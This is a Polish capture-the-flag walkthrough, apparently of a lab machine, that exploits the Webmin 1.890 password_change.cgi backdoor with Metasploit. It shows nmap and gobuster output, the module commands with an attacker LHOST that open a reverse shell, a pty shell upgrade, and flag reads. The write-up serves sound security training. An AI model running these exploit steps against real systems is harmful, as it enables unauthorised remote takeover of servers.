Wykorzystanie webmin_backdoor

*Enumeracja za pomoca nmap:*
```python
sudo nmap -sS -sV 10.10.15.97

Nmap scan report for 10.10.15.97
Host is up (0.045s latency).
Not shown: 998 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```


Nmap pokazał iż porty 22 oraz 10000 są otwarte.

W tej chwili nazwa użytkownika oraz hasło dla portu 22 nie są znane.
Należy zatem odwiedzić adres URL:
```python
https://10.10.15.97:10000
```

Pojawiły się pola do wpisania loginu i hasła, których również nie znam.

*W tym momencie dokonuję enumeracji katalogu w celu wyszukania ukrytych
katalogów na serwerze www:*
```python
gobuster dir -u http://10.10.15.97 --wordlist /usr/share/wordlists/dirb/common.txt


===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/18 06:23:42 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://10.10.15.97/: Get "http://10.10.15.97/": dial tcp 10.10.15.97:80: connect: connection refused
```

Niestety ta metoda niewiele wykazała.

*Uruchamiam msfconsole.*
Sprawdzam czy są moze jakieś exploity dla webmina.
search webmin 

```python
Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/webmin_show_cgi_exec       2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   1  auxiliary/admin/webmin/file_disclosure         2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_package_updates_rce  2022-07-26       excellent  Yes    Webmin Package Updates RCE
   3  exploit/linux/http/webmin_packageup_rce        2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   4  exploit/unix/webapp/webmin_upload_exec         2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE
   5  auxiliary/admin/webmin/edit_html_fileaccess    2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   6  exploit/linux/http/webmin_backdoor             2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
```

*Szukam exploita który nie prosi o poświadczenia:*
```python
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.10.15.97
set LHOST 10.18.105.140 
set SSL true
exploit
```

**Otrzymałem shell.**

*Próba otrzymania stabilniejszego shella:*
```python
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

*Uzyskałem roota:*
```python
cd home
cd dark
cat user.txt
```


*W katalogu root znajduje się plik root.txt:*
```python
cat root.txt
```
